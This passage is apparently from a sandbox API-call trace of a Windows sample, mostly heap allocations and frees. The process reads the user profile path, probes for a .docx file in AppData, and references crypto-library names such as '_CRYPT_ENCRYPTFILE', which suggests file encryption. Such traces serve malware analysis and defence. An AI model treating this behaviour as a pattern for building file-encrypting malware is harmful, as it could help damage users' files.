hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0221.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0221.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0221.033] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0221.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0221.033] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0221.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0221.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0221.034] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0221.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0221.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0221.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0221.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0221.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0221.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0221.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0221.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0221.035] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x3be0dd0 [0221.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0221.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0221.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0221.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0221.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0221.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506b0 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0221.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0221.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0221.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0221.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0221.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0221.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0221.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0221.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0221.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0221.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0221.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0221.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0221.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0221.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0221.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0221.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0221.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0221.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0221.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0221.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.042] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/3P0loyjD.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8887a660, ftCreationTime.dwHighDateTime=0x1d5eeaa, ftLastAccessTime.dwLowDateTime=0x448120a0, ftLastAccessTime.dwHighDateTime=0x1d5edbe, ftLastWriteTime.dwLowDateTime=0x448120a0, ftLastWriteTime.dwHighDateTime=0x1d5edbe, nFileSizeHigh=0x0, nFileSizeLow=0xca26, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="3P0loyjD.docx", cAlternateFileName="3P0LOY~1.DOC")) returned 0xa874d0 [0221.042] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0221.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0221.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0221.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0221.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0221.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0221.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0221.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0221.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0221.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0221.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0221.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0221.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.044] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0221.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0221.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0221.044] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0221.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0221.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0221.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0221.044] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, 